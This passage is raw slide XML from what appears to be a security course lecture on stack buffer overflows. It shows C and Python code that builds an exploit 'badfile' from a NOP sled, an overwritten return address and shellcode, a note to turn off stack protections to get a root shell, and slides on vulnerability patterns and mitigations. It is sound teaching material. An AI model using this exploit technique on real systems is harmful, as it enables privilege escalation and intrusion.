        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Bad File Construction</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Google Shape;301;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="769925"/>
            <a:ext cx="8520600" cy="369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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    char buffer[517];</a:t>
            </a:r>
            <a:endParaRPr sz="16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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    FILE *badfile;</a:t>
            </a:r>
            <a:endParaRPr sz="16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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    /* Initialize buffer with 0x90 (NOP instruction)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memset(&amp;buffer, 0x90, 517);</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//specify the return address at the right position</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	unsigned int offset = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0X24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF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F0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	unsigned int ret = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0xbfffea98</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	*((unsigned int *) (buffer + offset )) = ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>// copy the shell code towards the end of the buffer</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF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F0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode));</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    /* Save the contents to the file "badfile" */</a:t>
            </a:r>
            <a:endParaRPr sz="16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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    badfile = fopen("./badfile", "w");</a:t>
            </a:r>
            <a:endParaRPr sz="16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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    fwrite(buffer, 517, 1, badfile);</a:t>
            </a:r>
            <a:endParaRPr sz="16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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    fclose(badfile);</a:t>
            </a:r>
            <a:endParaRPr sz="16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latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="302" name="Google Shape;302;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5229813" y="77000"/>
            <a:ext cx="3838575" cy="1257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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Code to Generate the Bad File</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Google Shape;308;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1370350" y="993375"/>
            <a:ext cx="6681900" cy="369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Fill the content with NOP's</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>content = bytearray(0x90 for i in range(517)) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t># Put the shellcode at the end</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>start = 517 - len(shellcode) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>content[start:] = shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ret    = ______  </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>offset = _____ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>           </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>content[offset:offset + 4] = (ret).to_bytes(4,byteorder='little') </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t># Write the content to a file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>with open('badfile', 'wb') as f:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  f.write(content)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Google Shape;314;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Make sure to turn off stack protections:</a:t>
            </a:r>
            <a:endParaRPr u="sng">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Create the badfile</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u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="315" name="Google Shape;315;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="396100" y="1678038"/>
            <a:ext cx="8439150" cy="219075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="316" name="Google Shape;316;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="396105" y="1386887"/>
            <a:ext cx="7548141" cy="219075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="317" name="Google Shape;317;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1417450" y="2925475"/>
            <a:ext cx="5505450" cy="2076450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="318" name="Google Shape;318;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1385888" y="2343150"/>
            <a:ext cx="6372225" cy="457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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Google Shape;324;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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Exploit it to start a shell</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Exploit it to start a root shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="325" name="Google Shape;325;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064000" y="2954675"/>
            <a:ext cx="6267450" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="326" name="Google Shape;326;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="965100" y="1406225"/>
            <a:ext cx="4420775" cy="411650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="327" name="Google Shape;327;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064000" y="4026075"/>
            <a:ext cx="4501300" cy="411650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="328" name="Google Shape;328;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2464300"/>
            <a:ext cx="7010400" cy="257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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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 Pattern</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Google Shape;334;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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Input, whether read from the network, a file or the command line</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Transfer of data from said input to internal structures</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use of unsafe string handling calls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>arithmetic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to calculate an allocation size or remaining buffer size</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Off-by-one, wrap-around error, unchecked/incorrect calculation of buffer size, unchecked array indexing, integer overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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CVE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Google Shape;340;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="369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  CVE (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cve.mitre.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  entries in recent three years that is related to buffer overflow vulnerabilities. How many can you find? What platforms are affected?</a:t>
            </a:r>
            <a:endParaRPr/>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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Redemption Steps</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Google Shape;346;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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Application Level:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Replace dangerous string handling functions (strcpy, strcat,sprintf, gets)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Counting, termination, truncation </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Audit allocations</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Allocation size</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Check loops and array accesses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Replace C string buffers with C++ Strings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
